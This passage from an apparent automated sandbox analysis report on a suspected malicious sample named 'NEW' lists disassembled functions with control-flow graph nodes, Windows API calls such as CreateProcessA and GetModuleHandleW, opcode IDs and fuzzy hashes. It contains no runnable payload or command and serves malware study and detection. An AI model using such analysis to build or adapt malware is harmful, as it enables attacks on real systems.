c045d2e-c045d35 1512->1522 1513->1512 1521->1522 1525 c045d1d-c045d29 call c0437b4 1521->1525 1526 c045d37-c045d3e 1522->1526 1527 c045d51 1522->1527 1523->1524 1524->1411 1525->1522 1526->1527 1531 c045d40-c045d4c call c0437b4 1526->1531 1527->1448 1531->1527
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 1cac00a400ef0e08f7bae2caaf789653545cddc1d007f00c310edabc9a9a56be
                                                                                    • Instruction ID: 9d686c2d494daf83d42ba410396bbec2c20c916d2d5582945f8975e32cbe56a6
                                                                                    • Opcode Fuzzy Hash: 1cac00a400ef0e08f7bae2caaf789653545cddc1d007f00c310edabc9a9a56be
                                                                                    • Instruction Fuzzy Hash: D2022D75E00219CFDB24EB64CC54BDEB7B6BF99300F1086AAD50967290EF706A89CF51
                                                                                    Function 07CE03C8 Relevance: .7, Instructions: 651COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e62a953e400e7f0c031be1fc13ebcb28b379c270dbeb647e1d3b76d27bb91f37
                                                                                    • Instruction ID: a71b067143df70f26ea8db7b7e224bf8abb1eeb42cdc83ef6b5c737782f0e9cc
                                                                                    • Opcode Fuzzy Hash: e62a953e400e7f0c031be1fc13ebcb28b379c270dbeb647e1d3b76d27bb91f37
                                                                                    • Instruction Fuzzy Hash: BE426370E006198FDB64DFA9C89079EBBFABFC8300F148569D40AAB355DB349D85CB91
                                                                                    Function 0C040040 Relevance: .6, Instructions: 551COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 665bf6cdbdc4dd0206b945ee59a0a7e3f00a6a37a1add46ae25626559e04b428
                                                                                    • Instruction ID: e2ba491de434e6f06bf8d027a274dcc63a7f339103bcd90eb56e4a8f21f5ae48
                                                                                    • Opcode Fuzzy Hash: 665bf6cdbdc4dd0206b945ee59a0a7e3f00a6a37a1add46ae25626559e04b428
                                                                                    • Instruction Fuzzy Hash: 71320BB0B002198FDB68EB25C8547EE77F6BF88700F1481A9D5099B395DF349D828FA5
                                                                                    Function 079DEE28 Relevance: .5, Instructions: 547COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac82a7b60bf0271d90a650c86847afa91eef8404c433a6c4cb08353d10d4d007
                                                                                    • Instruction ID: 55c445bd82c7cc81dc8f855e655dd974f952e5c3300ecf6dd4862dc5f897b2d4
                                                                                    • Opcode Fuzzy Hash: ac82a7b60bf0271d90a650c86847afa91eef8404c433a6c4cb08353d10d4d007
                                                                                    • Instruction Fuzzy Hash: BB423A75A1061ACFCB21DF64C845AE9B7B2FF89304F14C599E419AB261EB71EE81CF40
                                                                                    Function 0C040D46 Relevance: .5, Instructions: 537COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 22da33c73d6830f8d761efc2f269e8a36ae827bf83b4178725268106b49e1517
                                                                                    • Instruction ID: da8c7a7a0f82ab37b4326c1af2f5c6b33c06860f7a9bd49ea851ec32b112c5cb
                                                                                    • Opcode Fuzzy Hash: 22da33c73d6830f8d761efc2f269e8a36ae827bf83b4178725268106b49e1517
                                                                                    • Instruction Fuzzy Hash: 4342E774A00219CFCB18DB28C995AD9B7F1FF89701F1541F9D909AB3A1DA31AD81CF61
                                                                                    Function 0CCD14E8 Relevance: .5, Instructions: 514COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5d2c78326ab982cd733dff4dccd05a2d392cb121612dc2367c08020066fc8468
                                                                                    • Instruction ID: 77403afe85e1f532e36a4d9e9d6c7856eef06570d3cdf93ab9b9629ca0162fd3
                                                                                    • Opcode Fuzzy Hash: 5d2c78326ab982cd733dff4dccd05a2d392cb121612dc2367c08020066fc8468
                                                                                    • Instruction Fuzzy Hash: 7E323731A10619CFCB21DF65C944BD9B7B2FF89304F1586E9E509AB260EB71AE85CF40
                                                                                    Function 0CCD8AB0 Relevance: .4, Instructions: 413COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f8e4d4209ca076c374c7fa92eaeffc8878e8c8b3c156f5f900fe57cf8d3d2091
                                                                                    • Instruction ID: 651bb9492d9d7700ee62439bfe8562958c68ea32acc0a68872590ddd8d4f94c7
                                                                                    • Opcode Fuzzy Hash: f8e4d4209ca076c374c7fa92eaeffc8878e8c8b3c156f5f900fe57cf8d3d2091
                                                                                    • Instruction Fuzzy Hash: 1BE18E717017058FDB29DB75C4507AEB7E6AFC9640F2548ADD24A8B2D0CF34E902CBA1
                                                                                    Function 07CE2733 Relevance: .3, Instructions: 276COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6550cd2589ac59e91b26ed8e36761318db05fe3b186e95a5d89afcc034ce8fd4
                                                                                    • Instruction ID: f661eddffd755bc1b426a9526221358980eee587c356040d9f0bb6bd0e2e2aa4
                                                                                    • Opcode Fuzzy Hash: 6550cd2589ac59e91b26ed8e36761318db05fe3b186e95a5d89afcc034ce8fd4
                                                                                    • Instruction Fuzzy Hash: C2C15EB1E006598FDB24CF69C88079EBBBAFF88310F14C165D849AB255DB70D985CF91
                                                                                    Function 058B1480 Relevance: .3, Instructions: 257COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f0675fb91256a220ec9e2535e5afbe62aca69df59eed04d13eaec414581e601
                                                                                    • Instruction ID: 3c0b5fd994dff28cec92d466ba2113b2f0048167932e05fd2cabc5b195c0e43c
                                                                                    • Opcode Fuzzy Hash: 9f0675fb91256a220ec9e2535e5afbe62aca69df59eed04d13eaec414581e601
                                                                                    • Instruction Fuzzy Hash: 87A19D70B007059FDB25EF79C49496ABBE6FF89310B148A69D80ACB355DB70ED01CB91
                                                                                    Function 01B0D149 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 425 1b0d149-1b0d1e7 GetCurrentProcess 430 1b0d1f0-1b0d224 GetCurrentThread 425->430 431 1b0d1e9-1b0d1ef 425->431 432 1b0d226-1b0d22c 430->432 433 1b0d22d-1b0d261 GetCurrentProcess 430->433 431->430 432->433 434 1b0d263-1b0d269 433->434 435 1b0d26a-1b0d285 call 1b0d328 433->435 434->435 439 1b0d28b-1b0d2ba GetCurrentThreadId 435->439 440 1b0d2c3-1b0d325 439->440 441 1b0d2bc-1b0d2c2 439->441 441->440
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 01B0D1D6
                                                                                    • GetCurrentThread.KERNEL32 ref: 01B0D213
                                                                                    • GetCurrentProcess.KERNEL32 ref: 01B0D250
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 01B0D2A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID:
                                                                                    • API String ID: 2063062207-0
                                                                                    • Opcode ID: 62e0d7a2df6c4338529a7285916f1bcf8cf2fbce86c7f47f7abc859034973eea
                                                                                    • Instruction ID: 0537804ec4f47848219c6db8308e9511f77aee3f9162f36e64724c3c0ff941a9
                                                                                    • Opcode Fuzzy Hash: 62e0d7a2df6c4338529a7285916f1bcf8cf2fbce86c7f47f7abc859034973eea
                                                                                    • Instruction Fuzzy Hash: 385167B19003098FDB19DFA9D548B9EBFF1EF48314F248059E019A7390D7349944CB66
                                                                                    Function 01B0D158 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 448 1b0d158-1b0d1e7 GetCurrentProcess 452 1b0d1f0-1b0d224 GetCurrentThread 448->452 453 1b0d1e9-1b0d1ef 448->453 454 1b0d226-1b0d22c 452->454 455 1b0d22d-1b0d261 GetCurrentProcess 452->455 453->452 454->455 456 1b0d263-1b0d269 455->456 457 1b0d26a-1b0d285 call 1b0d328 455->457 456->457 461 1b0d28b-1b0d2ba GetCurrentThreadId 457->461 462 1b0d2c3-1b0d325 461->462 463 1b0d2bc-1b0d2c2 461->463 463->462
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 01B0D1D6
                                                                                    • GetCurrentThread.KERNEL32 ref: 01B0D213
                                                                                    • GetCurrentProcess.KERNEL32 ref: 01B0D250
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 01B0D2A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID:
                                                                                    • API String ID: 2063062207-0
                                                                                    • Opcode ID: b8a83cbeab428591768d84616bfdb15f3a07d8fea017e7c03e0875341c0dad29
                                                                                    • Instruction ID: c137f679acd4c58e219ff79691f28ff2131f79155d580dbabeac44b811326375
                                                                                    • Opcode Fuzzy Hash: b8a83cbeab428591768d84616bfdb15f3a07d8fea017e7c03e0875341c0dad29
                                                                                    • Instruction Fuzzy Hash: E55135B1D003098FEB19DFAAD948B9EBBF1FF48314F248459E419A7390DB349984CB65
                                                                                    Function 058B3688 Relevance: 5.0, APIs: 3, Instructions: 508COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 059d38e30137b55ef7034058d103464417fca4dc18e02eab55b1213703bab1cd
                                                                                    • Instruction ID: 54602cc5caaa23553f73c6b74940733bb4d17092da0363de10f5a20a9f844328
                                                                                    • Opcode Fuzzy Hash: 059d38e30137b55ef7034058d103464417fca4dc18e02eab55b1213703bab1cd
                                                                                    • Instruction Fuzzy Hash: F0224B74E042098BEF24DB58C589AFEB7BBBB88314F248555DC11E7365CBB49C41CB52
                                                                                    Function 0755D008 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1199 755d008-755d09d 1201 755d0d6-755d0f6 1199->1201 1202 755d09f-755d0a9 1199->1202 1207 755d12f-755d15e 1201->1207 1208 755d0f8-755d102 1201->1208 1202->1201 1203 755d0ab-755d0ad 1202->1203 1205 755d0d0-755d0d3 1203->1205 1206 755d0af-755d0b9 1203->1206 1205->1201 1209 755d0bd-755d0cc 1206->1209 1210 755d0bb 1206->1210 1218 755d197-755d251 CreateProcessA 1207->1218 1219 755d160-755d16a 1207->1219 1208->1207 1211 755d104-755d106 1208->1211 1209->1209 1212 755d0ce 1209->1212 1210->1209 1213 755d129-755d12c 1211->1213 1214 755d108-755d112 1211->1214 1212->1205 1213->1207 1216 755d114 1214->1216 1217 755d116-755d125 1214->1217 1216->1217 1217->1217 1220 755d127 1217->1220 1230 755d253-755d259 1218->1230 1231 755d25a-755d2e0 1218->1231 1219->1218 1221 755d16c-755d16e 1219->1221 1220->1213 1223 755d191-755d194 1221->1223 1224 755d170-755d17a 1221->1224 1223->1218 1225 755d17c 1224->1225 1226 755d17e-755d18d 1224->1226 1225->1226 1226->1226 1227 755d18f 1226->1227 1227->1223 1230->1231 1241 755d2f0-755d2f4 1231->1241 1242 755d2e2-755d2e6 1231->1242 1243 755d304-755d308 1241->1243 1244 755d2f6-755d2fa 1241->1244 1242->1241 1245 755d2e8 1242->1245 1247 755d318-755d31c 1243->1247 1248 755d30a-755d30e 1243->1248 1244->1243 1246 755d2fc 1244->1246 1245->1241 1246->1243 1250 755d32e-755d335 1247->1250 1251 755d31e-755d324 1247->1251 1248->1247 1249 755d310 1248->1249 1249->1247 1252 755d337-755d346 1250->1252 1253 755d34c 1250->1253 1251->1250 1252->1253
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0755D23E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 6afaffc3a52ae4f8070e06c54f8d90a2ed15cf409280901f9169b16b28210aaa
                                                                                    • Instruction ID: f419e21a488b99917b4a9386c89f8446ad4af72af3f0a1ca4e97a877af4d6dff
                                                                                    • Opcode Fuzzy Hash: 6afaffc3a52ae4f8070e06c54f8d90a2ed15cf409280901f9169b16b28210aaa
                                                                                    • Instruction Fuzzy Hash: 37914DB1E0031ADFEB24CFA9C891BDEBBB2BF44314F14816AD808A7250D7759985CF91
                                                                                    Function 079D1BC8 Relevance: 1.7, APIs: 1, Instructions: 212threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1255 79d1bc8-79d1c2c 1258 79d1eba-79d1f11 1255->1258 1259 79d1c32-79d1c4a 1255->1259 1282 79d1ead-79d1eb7 1258->1282 1283 79d1f13-79d1f43 1258->1283 1265 79d1c4c-79d1c52 1259->1265 1266 79d1c62-79d1c64 1259->1266 1268 79d1c54 1265->1268 1269 79d1c56-79d1c58 1265->1269 1270 79d1c74-79d1cd5 GetCurrentThreadId 1266->1270 1271 79d1c66-79d1c6d 1266->1271 1268->1266 1269->1266 1280 79d1cde-79d1ce7 1270->1280 1281 79d1cd7-79d1cdd 1270->1281 1271->1270 1285 79d1ce9-79d1cef 1280->1285 1286 79d1cf8-79d1cfe 1280->1286 1281->1280 1296 79d1f45-79d1f5c 1283->1296 1297 79d1f64-79d1f6a 1283->1297 1285->1286 1288 79d1cf1 1285->1288 1289 79d1d07-79d1d24 1286->1289 1290 79d1d00-79d1d05 1286->1290 1288->1286 1295 79d1d2d-79d1d4d 1289->1295 1290->1289 1300 79d1d6d-79d1d88 1295->1300 1301 79d1d4f-79d1d65 1295->1301 1296->1297 1304 79d1d8a 1300->1304 1305 79d1d92-79d1d93 1300->1305 1301->1300 1304->1305 1305->1282
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 079D1CC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 2882836952-0
                                                                                    • Opcode ID: 955fcf6703137ddcb136271d01e45e0fc38211706b60687dd3c4dec5fd15d2f2
                                                                                    • Instruction ID: 1cc008cd0ef4abd68a6e2943242dddef4296b6a257f58dc460d6ad7c03ac2792
                                                                                    • Opcode Fuzzy Hash: 955fcf6703137ddcb136271d01e45e0fc38211706b60687dd3c4dec5fd15d2f2
                                                                                    • Instruction Fuzzy Hash: FA71BDB1E003098FDB25DFA9D854AEDBBF6BF88314F14852AD415AB350DB709D06CBA1
                                                                                    Function 01B0AED0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1309 1b0aed0-1b0aedf 1310 1b0aee1-1b0aeee call 1b098d8 1309->1310 1311 1b0af0b-1b0af0f 1309->1311 1316 1b0aef0 1310->1316 1317 1b0af04 1310->1317 1313 1b0af11-1b0af1b 1311->1313 1314 1b0af23-1b0af64 1311->1314 1313->1314 1320 1b0af71-1b0af7f 1314->1320 1321 1b0af66-1b0af6e 1314->1321 1365 1b0aef6 call 1b0b168 1316->1365 1366 1b0aef6 call 1b0b159 1316->1366 1317->1311 1322 1b0af81-1b0af86 1320->1322 1323 1b0afa3-1b0afa5 1320->1323 1321->1320 1325 1b0af91 1322->1325 1326 1b0af88-1b0af8f call 1b0a8b4 1322->1326 1328 1b0afa8-1b0afaf 1323->1328 1324 1b0aefc-1b0aefe 1324->1317 1327 1b0b040-1b0b100 1324->1327 1332 1b0af93-1b0afa1 1325->1332 1326->1332 1360 1b0b102-1b0b105 1327->1360 1361 1b0b108-1b0b133 GetModuleHandleW 1327->1361 1330 1b0afb1-1b0afb9 1328->1330 1331 1b0afbc-1b0afc3 1328->1331 1330->1331 1335 1b0afd0-1b0afd9 call 1b0a8c4 1331->1335 1336 1b0afc5-1b0afcd 1331->1336 1332->1328 1340 1b0afe6-1b0afeb 1335->1340 1341 1b0afdb-1b0afe3 1335->1341 1336->1335 1342 1b0b009-1b0b016 1340->1342 1343 1b0afed-1b0aff4 1340->1343 1341->1340 1350 1b0b018-1b0b036 1342->1350 1351 1b0b039-1b0b03f 1342->1351 1343->1342 1345 1b0aff6-1b0b006 call 1b0a8d4 call 1b0a8e4 1343->1345 1345->1342 1350->1351 1360->1361 1362 1b0b135-1b0b13b 1361->1362 1363 1b0b13c-1b0b150 1361->1363 1362->1363 1365->1324 1366->1324
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 01B0B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 52f5a91696d62489afa7dc8cc51dc71c2b5b402945205b5fb8084df10aca61d5
                                                                                    • Instruction ID: 03aec1be83046b4ddf1ce24ef4c6ebe316b8d2a95f6b39100d91e767604dd33d
                                                                                    • Opcode Fuzzy Hash: 52f5a91696d62489afa7dc8cc51dc71c2b5b402945205b5fb8084df10aca61d5
                                                                                    • Instruction Fuzzy Hash: 4B7145B0A00B058FEB2ADF29D55475ABBF5FF88300F008A6DD486DBA80D775E945CB91
                                                                                    Function 058BBDC0 Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1367 58bbdc0-58bbe19 1370 58bbe1b-58bbe28 1367->1370 1371 58bbe2f-58bbe35 1367->1371 1370->1371 1372 58bbe37-58bbe3d 1371->1372 1373 58bbe56-58bbe9c 1371->1373 1372->1373 1375 58bbe3f-58bbe48 1372->1375 1384 58bbe9e-58bbea8 call 58bb198 1373->1384 1385 58bbec5-58bbecf 1373->1385 1375->1373 1377 58bbe4a-58bbe50 1375->1377 1377->1373 1378 58bbf4b-58bbf5e 1377->1378 1380 58bbf60-58bbf78 call 58b761c 1378->1380 1392 58bbf7a-58bbfc2 1380->1392 1393 58bbfc9 1380->1393 1389 58bbead-58bbec0 1384->1389 1385->1378 1387 58bbed1-58bbede 1385->1387 1390 58bbeec-58bbef5 1387->1390 1391 58bbee0-58bbee6 1387->1391 1389->1380 1395 58bbf03-58bbf46 call 58b45a0 KiUserCallbackDispatcher 1390->1395 1396 58bbef7-58bbefd 1390->1396 1391->1390 1394 58bbee8 1391->1394 1392->1393 1394->1390 1395->1378 1396->1395 1397 58bbeff 1396->1397 1397->1395
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00000014,?,?,0435412C,033708D8,?,00000000), ref: 058BBF46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: a1d0d5c13f992a6d9d19677484699e9957c21dc8bd6d0287dd37a662710ef8a8
                                                                                    • Instruction ID: 534a52b55ac9dc350684d6bd20a4e553e880586d5f8bb26ad84d59ce8e916818
                                                                                    • Opcode Fuzzy Hash: a1d0d5c13f992a6d9d19677484699e9957c21dc8bd6d0287dd37a662710ef8a8
                                                                                    • Instruction Fuzzy Hash: FF71AE74A01209AFDB15DFA8D898DAEBBB6BF48711F114099F901AB361DB71EC81CF50
                                                                                    Function 079D2100 Relevance: 1.7, APIs: 1, Instructions: 170windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1544 79d2100-79d2105 1545 79d2107-79d2109 1544->1545 1546 79d20a1 1544->1546 1547 79d210b-79d214a call 79d02f4 1545->1547 1548 79d20a5-79d20ab 1545->1548 1546->1548 1558 79d214c-79d214e call 79d0304 1547->1558 1559 79d2153-79d2157 call 7ce17eb 1547->1559 1550 79d20ad-79d20b0 1548->1550 1551 79d20b5-79d20d2 PostMessageW 1548->1551 1550->1551 1552 79d20db-79d20fc 1551->1552 1553 79d20d4-79d20da 1551->1553 1553->1552 1558->1559 1561 79d215c-79d216a 1559->1561 1563 79d216c-79d2175 1561->1563 1564 79d2198 1561->1564 1563->1564 1569 79d2177-79d2180 1563->1569 1565 79d219a-79d21a0 1564->1565 1567 79d229e-79d22a5 1565->1567 1568 79d21a6-79d21d1 call 79d0320 1565->1568 1579 79d21d6-79d21fb call 79d0330 1568->1579 1580 79d21d3 1568->1580 1569->1564 1572 79d2182-79d2196 call 79d0314 1569->1572 1572->1565 1585 79d21fd 1579->1585 1586 79d2200-79d2223 1579->1586 1580->1579 1585->1586 1589 79d222a-79d2243 call 79d0340 call 79d034c 1586->1589 1589->1567 1594 79d2245-79d2254 1589->1594 1597 79d2255 1594->1597 1598 79d221b-79d2223 1597->1598 1599 79d2257-79d22b9 1597->1599 1598->1589 1599->1597 1606 79d22bb-79d22eb 1599->1606 1609 79d2381-79d2394 1606->1609 1610 79d22f1 1606->1610 1624 79d239f-79d23a3 1609->1624 1625 79d2396-79d2398 1609->1625 1611 79d230d-79d2317 call 79d035c 1610->1611 1612 79d234d-79d2354 1610->1612 1613 79d22f8-79d230b 1610->1613 1614 79d2338-79d234b 1610->1614 1615 79d2320-79d2336 1610->1615 1611->1609 1627 79d2319 1611->1627 1616 79d236e-79d237a 1612->1616 1617 79d2356-79d236c 1612->1617 1613->1609 1614->1609 1615->1609 1616->1609 1617->1609 1625->1624 1627->1612 1627->1614 1627->1615
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 079D20C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 528f9451ee09f8105f1f9470cac43ed488d0d7d8f801071f3144367cee724cbf
                                                                                    • Instruction ID: 8fbeaf3c29f0c4dcc2dd01fbe083a649a99ef423dfab6e60b94e15ff963af29f
                                                                                    • Opcode Fuzzy Hash: 528f9451ee09f8105f1f9470cac43ed488d0d7d8f801071f3144367cee724cbf
                                                                                    • Instruction Fuzzy Hash: 5A51D2B1A002068FDF15EBB8D8547EEBBB6AFC8304F148429D501A7291EF749D46CB61
                                                                                    Function 079D1BB1 Relevance: 1.7, APIs: 1, Instructions: 168threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 079D1CC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 2882836952-0
                                                                                    • Opcode ID: d22e9c09009330fd0a7a5bf1aab95440901d497cb6e4893e144295210787a26e
                                                                                    • Instruction ID: 39286328191a0e69d2e26ec35507ad4d5ccebc7c83a6a945bd8472ee8a5771eb
                                                                                    • Opcode Fuzzy Hash: d22e9c09009330fd0a7a5bf1aab95440901d497cb6e4893e144295210787a26e
                                                                                    • Instruction Fuzzy Hash: 5161BCB2E0035D8FDF25DFA5C854AEDBBF6AF48304F15815AD811AB290DB749C01CBA1
                                                                                    Function 058B1CE5 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058B1E02
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 6f811e0d9de187d837198f0d2abbaefdca079cd16d70b92b7cfc8f822d038aa9
